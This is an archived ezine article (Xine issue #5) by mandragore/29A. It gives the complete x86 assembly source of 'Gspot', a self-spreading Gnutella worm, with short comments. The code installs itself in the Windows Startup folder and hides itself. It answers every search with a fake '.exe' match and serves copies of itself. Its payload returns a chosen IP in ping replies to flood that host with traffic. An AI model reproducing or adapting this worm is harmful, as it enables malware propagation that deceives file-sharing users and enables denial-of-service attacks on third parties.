Copy Link
Add to Bookmark
Report

Xine - issue #5 - Phile 215

eZine's profile picture
Published in 
Xine
 · 7 months ago

 

Ú-----------------------------¿
| Xine - issue #5 - Phile 215 |
À-----------------------------Ù





comment #

most of today's file sharing apps are usin a dummy protocol
Gnetworks can be easily taken down or abused.
this worm is a -basic- proof of concept..

Gspot acts like a Gnutella client, excepts that it connects automatically
to the local Gnode to reach a Gnetwork, and then catches the search querys.
It reports a result by appending a '.exe' to the search criteria.
Its file server is running on port 99.
A lil payload is included.. It replyes to 'G-pings' by a www's IP.
This could cause -heavy- traffic on that target if this worm spreads well.
Tested with Gnutella v0.56 .

more to come later :))



-><- mandragore / 29A -><-

#


include gspot.inc

.data

; main thread
lsin saddr <2,6300h,0,0>
org $-4
threads dd ?

lsock dd ?

rkey db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
rskey db 'Startup',0

; thread 1
rpacket _result <>
db 300 dup(?)
csock dd ?
csin saddr <2,0CA18h,0,0>
conask db 'GNUTELLA CONNECT/0.4',10,10
conasksz equ $-conask
conget db 'GNUTELLA OK',10,10
congetsz equ $-conget
recvd db 200 dup(?)

; thread 2
ssock dd ?
hndl dd ?
fsz dd ?
httpreq db 100 dup(?)
httphd db 'HTTP 200 OK',13,10
db 'Server: Gnutella',13,10
db 'Content-type:application/binary',13,10
db 'Content-length:'
spotsize db 24 dup(?)

eodseg:

.code

;=============================== core -------------------------------------

Start:
push off lsock
push off rkey
push 80000001h
callw RegOpenKeyA
or eax,eax
jnz __bye

mov threads,500
push off threads
push off eodseg
push off rkey
push 0
push off rskey
push lsock
callw RegQueryValueExA ; get Startup folder

push lsock
callw RegCloseKey

lea esi,eodseg
mov ebp,esi
lodsb
cmp al,0
jne $-3
xchg edi,esi
dec edi
mov eax,'psG\'
stosd
mov eax,'e.to'
stosd
mov eax,00006578h
stosd
push 0
push ebp
push edi

push 400
push edi
push 0
callw GetModuleFileNameA

callw CopyFileA ; copy file
or eax,eax
jz __installed ; already exists ? then run worm

push 6
push ebp
callw SetFileAttributesA ; attrib +hs, then leave
jmp __bye

__installed:
mov ecx,cs
or ch,ch
jz __nt ; if NT then skip

call $+14
db 'kernel32',0
callw GetModuleHandleA
call $+28
db 'RegisterServiceProcess',0 ;...
push eax
callw GetProcAddress
mov edx,eax
callw GetCurrentProcessId
push 1
push eax
call edx

__nt:
push off eodseg
push 101h
callw WSAStartup
inc eax
jz __bye

push off threads
push 0
push 0
push off connex
push 0
push 0
callw CreateThread ; fork the thread for outgoing connection

push 6
push 1
push 2
callw socket
mov lsock,eax

push 16
push off lsin
push lsock
callw bind
inc eax
jz __bye ; error handling + 'residency' checking

__sniff:
push 10
push lsock
callw listen

push 0
push 0
push lsock
callw accept

push off threads
push 0
push eax ; new socket as arg
push off propag
push 0
push 0
callw CreateThread ; fork to handle incoming connex

cdq
dec edx
push edx
push eax
callw WaitForSingleObject

jmp __sniff

__bye: callw WSACleanup
push 0
callw ExitProcess


sig db '[Gspot 1]',0,'freely shared by mandragore/29A',0

;----------------------------- outgoing connex

connex:
call __getip
mov csin.sip,eax ; local Gnode

push 10000
callw Sleep ; don't hammer

push csock
callw closesocket

push 6
push 1
push 2
callw socket
mov csock,eax

push 16
push off csin
push eax
callw connect
inc eax
jz connex

push 0
push conasksz
push off conask
push csock
callw send

push 0
push 100
push off recvd
push csock
callw recv
or eax,eax
jz connex
inc eax
jz connex

lea esi,conget
lea edi,recvd
mov ecx,congetsz
repz cmpsb ; connection granted ?
jecxz $+7
jmp connex

__sniff:
push 0
push 100
push off recvd
push csock
callw recv
or eax,eax
jz connex
inc eax
jz connex

cmp bptr [recvd.func],0
je __payload
; cmp bptr [recvd.func],40h ; to come :)
; je
cmp bptr [recvd.func],80h ; search request ?
jne __sniff

lea esi,recvd
lea edi,rpacket
mov ecx,16
rep movsb ; msg ID
mov eax,00000781h
stosd ; query_hit, ttl 7, hops 0
dec edi
lea esi,[recvd.stringz]
mov ecx,esi
lodsb
cmp al,0
jne $-3
cmp bptr [esi],0
jne $-8
sub esi,ecx
xchg esi,ecx
dec ecx
push ecx ; size of request string
mov eax,ecx
add eax,41 ; 1+2+4+4+4+4+4+2+16
stosd ; size of datas

mov eax,00006301h ; 1 matching result, port 99
stosd
dec edi

call __getip
stosd

mov eax,00000200h ; 512k as bandwidth
stosd

xor eax,eax
stosd ; index

push 400
push off eodseg
push 0
callw GetModuleFileNameA
push 0
push off eodseg
callw _lopen
push eax
push 0
push eax
callw GetFileSize
mov ebp,eax
stosd ; filesize in bytes
callw _lclose
cmp ebp,-1
je __sniff
pop ecx
rep movsb ; search criteria
mov eax,'exe.'
stosd ; + ".exe"
xchg eax,ecx
stosw ; null null
mov eax,1DeadFedh
stosd
stosd ; the client ID of Gspot
stosd
stosd

__forkpacket:
push 0
mov eax,[rpacket.resz]
add eax,gheadsz+4
push eax
push off rpacket
push csock
callw send

lea edi,recvd
mov ecx,size recvd /4
xor eax,eax
rep stosd

jmp __sniff

__getip:
push esi
push 150
push off eodseg
callw gethostname
push off eodseg
callw gethostbyname
mov esi,[eax.ptrAddr]
lodsd
cmp bptr [esi],0
jne $-4
mov eax,[eax] ; ip of the last interface
pop esi
ret

__payload:
lea esi,recvd
lea edi,rpacket
mov ecx,16
rep movsb ; msg ID
mov eax,0000ff01h
stosd ; pong
dec edi
mov eax,14
stosd
mov ax,0050h ; port 80
stosw
mov eax,50C2E140h ; put your favorite IP here :))
stosd
mov eax,20
stosd
stosd
jmp __forkpacket

;---------------------------- file propagation

propag:
pop eax
pop [ssock]

push 0
push 100
push off httpreq
push ssock
callw recv

push 400
push off eodseg
push 0
callw GetModuleFileNameA
push 0
push off eodseg
callw _lopen
mov hndl,eax
push 0
push eax
callw GetFileSize ; ... get our size
mov fsz,eax

; eax holds the filesize
lea edi,spotsize ; ptrStr
mov ebx,10 ; radix
sub esp,24h
mov esi,esp
xor edx,edx
div ebx
mov [esi],dl
inc esi
or eax,eax ; I mostly ripped this rutine from APJ #1
jnz $-9 ; heya mammoth
dec esi
mov al,[esi] ; Computes the ascii file size for
cmp al,10 ; the http header
jl $+4
add al,cl
add al,'0'
stosb
cmp esi,esp
jg $-14
add esp,24h

mov eax,0a0d0a0dh
stosd

lea esi,httphd
sub edi,esi
push 0
push edi
push esi
push ssock
callw send ; send the pseudo HTTP/1.0 header

push fsz
push 0
callw GlobalAlloc
mov ebx,eax
push fsz
push eax ; read the file to a dyn buffer
push hndl ; small enough to not have to map the file
callw _lread
push hndl
callw _lclose

push 0
push fsz
push ebx
push ssock
callw send

push ebx
callw GlobalFree

push ssock
callw closesocket

__bye: push 0
callw ExitThread

end Start

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT